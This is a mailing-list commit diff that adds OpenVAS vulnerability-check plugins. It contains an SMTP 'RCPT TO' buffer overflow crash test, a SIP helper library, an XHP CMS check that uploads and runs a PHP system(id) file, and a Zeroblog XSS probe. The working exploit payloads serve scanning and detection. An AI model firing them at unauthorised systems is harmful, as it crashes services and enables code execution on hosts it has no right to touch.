+ script_bugtraq_id(20681);
+
+ name["english"] = "QK SMTP Server 'RCPT TO' buffer overflow vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote SMTP server is prone to a stack based overflow.
+
+Description :
+
+QK SMTP Server is installed on the remote host.
+The application does not properly check it's boundaries for
+user supplied input in the 'RCPT TO' field.
+
+This results in a stack based overflow, where it's possible to
+crash the service or compromise the host.
+
+See also :
+
+http://www.securiteam.com/exploits/6P00O15H6U.html
+
+Solution :
+
+Upgrade to QK SMTP Server 3.1 beta or a newer release.
+
+Risk factor :
+
+Critical / CVSS Base Score : 10
+(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for the presence of a buffer overflow in QK SMTP Server";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Gain root remotely");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("smtpserver_detect.nasl", "smtp_settings.nasl");
+ script_require_ports("Services/smtp", 25);
+ exit(0);
+}
+
+include("smtp_func.inc");
+
+port = get_kb_item("Services/smtp");
+if (!port) port = 25;
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (!soc) exit(0);
+
+banner = smtp_recv_banner(socket:soc);
+if ("QK SMTP Server" >< banner) {
+
+ # This works regardless of the results from smtp_settings.nasl.
+ domain = get_kb_item("Settings/third_party_domain");
+ sender = get_kb_item("SMTP/headers/From");
+ helo = string("EHLO ", domain, "\r\n");
+ from = string("MAIL FROM: ", sender, "\r\n");
+ bof = string("RCPT TO: ", crap(data:raw_string(0x41), length:4500), "@", domain, "\r\n");
+
+ # First send the HELO
+ send(socket:soc, data:helo);
+ recv = recv(socket:soc, length:1024);
+ if ("250-Hello" >!< recv) exit(0);
+
+ # From address
+ send(socket:soc, data:from);
+ recv = recv(socket:soc, length:1024);
+ if ("Address Okay" >!< recv) exit(0);
+
+ # The overflow
+ send(socket:soc, data:bof);
+ recv = recv(socket:soc, length:1024);
+ if (soc) {
+ send(socket:soc, data:string("QUIT\r\n"));
+ close(soc);
+ }
+
+ # try to re-open the connection and get some data from it.
+ soc = open_sock_tcp(port);
+ if (soc) {
+ line = smtp_recv_line(socket:soc, code:"220");
+ }
+ if (!soc || (!strlen(line))) {
+ security_hole(port);
+ }
+ if (soc) {
+ send(socket:soc, data:string("QUIT\r\n"));
+ close(soc);
+ }
+}
Added: trunk/openvas-plugins/scripts/sip.inc
===================================================================
--- trunk/openvas-plugins/scripts/sip.inc 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/sip.inc 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,77 @@
+#
+# (C) 2007 Ferdy Riphagen <f.riphagen at nsec.nl>
+#
+# $Revision: 1.0 $
+# GPLv2
+#
+# Experimental!
+#
+
+#--------------------------------------------------------#
+# function get_sip_banner: #
+# Some function code taken from 'sip_detection.nasl' #
+# (C) 2006 Josh Zlatin-Amishav and Ferdy Riphagen #
+#--------------------------------------------------------#
+
+function get_sip_banner(port) {
+ local_var soc, opt, r, banner;
+ global_var port;
+
+ banner = get_kb_item(strcat("sip/banner/", port));
+ if (banner) return banner;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "Max-Forwards: 70\r\n",
+ "To: <sip:", this_host(), ":", port, ">\r\n",
+ "From: Nessus <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: 63104 OPTIONS\r\n",
+ "Contact: <sip:", this_host(), ">\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ else return NULL;
+}
+
+
+#--------------------------------------------------------#
+# function sip_send_recv: #
+# Send self modified SIP packets #
+# returns received packets #
+#--------------------------------------------------------#
+
+function sip_send_recv(port, data) {
+ local_var ret, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ if (soc) {
+ send(socket:soc, data:data);
+ ret = recv(socket:soc, length:1024);
+ if (!isnull(ret)) return ret;
+ }
+ return NULL;
+}
+
Added: trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl
===================================================================
--- trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,139 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory by : rgod
+# http://retrogod.altervista.org/XHP_CMS_05_xpl.html
+#
+
+desc["english"] = "
+Synopsis :
+
+The remote webserver is hosting a PHP script which
+is vulnerable to a unrestricted file upload flaw.
+
+Description :
+
+XHP CMS is installed on the remote system.
+The installed application does not authenticate users to access
+the FileManager scripts located at:
+
+'/inc/htmlarea/plugins/FileManager/manager.php'
+
+and
+
+'/inc/htmlarea/plugins/FileManager/standalonemanager.php'
+
+This allows an attacker to upload content to the webserver, and
+execute arbitrary commands with privileges of the webserver account.
+
+See also :
+
+http://www.securityfocus.com/bid/17209
+http://xhp.targetit.ro/index.php?page=3&box_id=34&action=show_single_entry&post_id=10
+
+Solution :
+
+Upgrade to version 0.51 or a newer release.
+
+Risk factor :
+
+High / CVSS Base Score : 7
+(AV:R/AC:L/Au:NR/C:P/A:P/I:P/B:N)";
+script_description(english:desc["english"]);
+
+if (description) {
+ script_id(200100);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-1371");
+ script_bugtraq_id(17209);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"24058");
+ script_xref(name:"OSVDB", value:"24059");
+ }
+
+ name["english"] = "XHP CMS Version <= 0.5 File Upload Vulnerability";
+ script_name(english:name["english"]);
+ summary["english"] = "Checks for a arbitrary file upload and execution flaws";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DESTRUCTIVE_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencie("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/xhp", "/xhpcms", cgi_dirs());
+else dirs = make_list("/test/xhp", cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/inc/htmlarea/plugins/FileManager/standalonemanager.php"), port:port);
+ if ("XHP File Manager" >!< res) exit(0);
+
+ if (!safe_checks()) {
+ rand = rand();
+ file = string("DELETE_FILE_", rand, ".php");
+ content = "<?php system(id); ?>";
+
+ exp = string(
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="dir"', "\r\n\r\n",
+ "/\r\n",
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="upload"; filename="', file, '"', "\r\n",
+ "Content-Type: text/plain\r\n\r\n",
+ content, "\r\n",
+ "--", rand, "\r\n",
+ 'Content-Disposition: form-data; name="submit"', "\r\n\r\n",
+ "Upload\r\n",
+ "--", rand, "--\r\n");
+
+ req = string(
+ "POST ", dir, "/inc/htmlarea/plugins/FileManager/images.php HTTP/1.1\r\n",
+ "Content-Type: multipart/form-data; boundary=", rand, "\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "Content-Length: ", strlen(exp), "\r\n",
+ "Connection: close\r\n\r\n",
+ exp);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
+
+ req2 = http_get(item:string(dir, "/filemanager/", file), port:port);
+ recv2 = http_keepalive_send_recv(data:req2, port:port, bodyonly:TRUE);
+
+ if (recv2 == NULL) exit(0);
+ if(egrep(pattern:"uid=[0-9]+.*gid=[0-9]+", string:recv2)) {
+ report = string(
+ desc["english"], "\n\n",
+ "Note :\n\n",
+ "## It was possible to upload and execute a file on the remote webserver.\n",
+ "## The file is placed in directory: ", '"', dir, "/filemanager/", '"', "\n",
+ "## and is named: ", '"', file, '"', "\n\n",
+ "## You should delete this file as soon as possible !!!\n");
+
+ security_hole(port:port, data:report);
+ exit(0);
+ }
+ }
+ else {
+ req = http_get_cache(item:string(dir, "/index.php"), port:port);
+
+ if (egrep(pattern:"<a href[^>]+>Powered by XHP CMS v0\.(4\.1|5)", string:req)) {
+ security_hole(port:port, data:desc["english"]);
+ exit(0);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/zeroblog_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/zeroblog_xss.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/zeroblog_xss.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,89 @@
+#
+# Script Written By Ferdy Riphagen
+# <f(dot)riphagen(at)nsec(dot)nl>
+#
+# This script is released under the GNU GPLv2
+#
+
+if (description) {
+script_id(200003);
+script_version("$Revision: 1.0 $");
+
+script_bugtraq_id(15078);
+
+name["english"] = "Zeroblog <= 1.2a Cross-Site Scripting Vulnerability";
+script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+The remote host contains a PHP script that is vulnerable to cross-site
+scripting attacks.
+
+Description :
+
+The remote host appears to be running ZeroBlog.
+
+A vulnerability was identified in Zeroblog, which may be exploited by
+remote attackers to inject script code.
+
+ZeroBlog does not properly sanitize user input in the 'threadID', 'replyID' and 'albumID' parameters.
+
+Solution :
+
+Unknown at this time.
+
+Risk factor :
+
+Low";
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if Zeroblog is vulnerable to cross-site scripting attacks.";
+script_summary(english:summary["english"]);
+
+script_category(ACT_GATHER_INFO);
+script_family(english:"CGI abuses : XSS");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+include("url_func.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+if (get_kb_item("www/", port, "/generic_xss")) exit(0);
+
+xss = "'<IFRAME SRC=javascript:alert(%27XSS DETECTED BY NESSUS%27)></IFRAME>";
+exss = urlencode(str:xss);
+
+if (thorough_tests) dirs = make_list("/zeroblog", "/", "/blog", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs)
+{
+ res = http_get_cache(item:string(dir, "/thread.php"), port:port);
+ if (res == NULL) exit(0);
+
+ if (egrep(pattern:">.*Copyright.*(C).*ZeroCom.*computers", string:res))
+ {
+ req = http_get(item:string(dir, "/thread.php?threadID=", exss), port:port);
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if(recv == NULL)exit(0);
+
+ if(xss >< recv)
+ {
+ security_note(port);
+ exit(0);
+ }
+ }
+}
More information about the Openvas-commits
mailing list